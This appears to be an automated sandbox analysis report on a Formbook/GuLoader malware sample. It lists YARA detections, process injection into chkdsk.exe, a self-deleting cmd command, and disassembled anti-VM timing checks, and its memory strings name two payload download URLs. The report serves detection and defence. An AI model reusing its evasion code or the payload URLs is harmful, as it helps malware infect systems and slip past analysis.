      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@17/13
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile created: C:\Users\user\AppData\Local\Temp\~DFC9489ADE652B7AA1.TMPJump to behavior
      Source: F63V4i8eZU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: F63V4i8eZU.exeVirustotal: Detection: 10%
      Source: unknownProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
      Source: F63V4i8eZU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
      Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_00406408 push es; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_00405D8C push es; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1833 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0218 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4A13 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3213 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1A13 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6214 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5A03 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4205 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2A05 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1205 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4233 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2A33 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1233 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5A33 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5225 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2224 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6A24 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0A58 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B5253 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3A54 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B2254 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6A54 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B0248 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B4A44 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B3244 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B1A44 push edx; ret
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_021B6244 push edx; ret

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A84
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AFD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AD6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A78B2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3920 LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7EFC LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3C4D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488 NtWriteVirtualMemory,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://KINMIRAI.ORG/WP-CONTENT/BIN_QVWER224.BINHTTP://FARMERSSCHOOL.GE/BIN_QVWER224.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A790A second address: 00000000022A79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34D2B83Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34D2B804h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A77CE second address: 00000000022A77CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34BDCE6Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34BDD441h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34BDCF8Bh 0x0000003d lfence 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A47EF second address: 00000000022A480D instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ebx, 17707658h 0x00000009 sub ebx, D3E79B27h 0x0000000f push ebx 0x00000010 test ecx, ecx 0x00000012 mov ebx, dword ptr [ebp+000001F3h] 0x00000018 pushad 0x00000019 mov ebx, 000000A4h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A480D second address: 00000000022A4843 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 nop 0x00000004 push A346122Fh 0x00000009 add dword ptr [esp], 1CC77B86h 0x00000010 xor dword ptr [esp], D8053D6Bh 0x00000017 cmp dx, bx 0x0000001a add dword ptr [esp], E7F74F24h 0x00000021 cmp al, cl 0x00000023 mov eax, ebp 0x00000025 add eax, 00000100h 0x0000002a mov dword ptr [eax], 05D9D0D6h 0x00000030 pushad 0x00000031 mov esi, 00000061h 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 000000000056790A second address: 00000000005679F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34BDD30Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34BDD2D4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
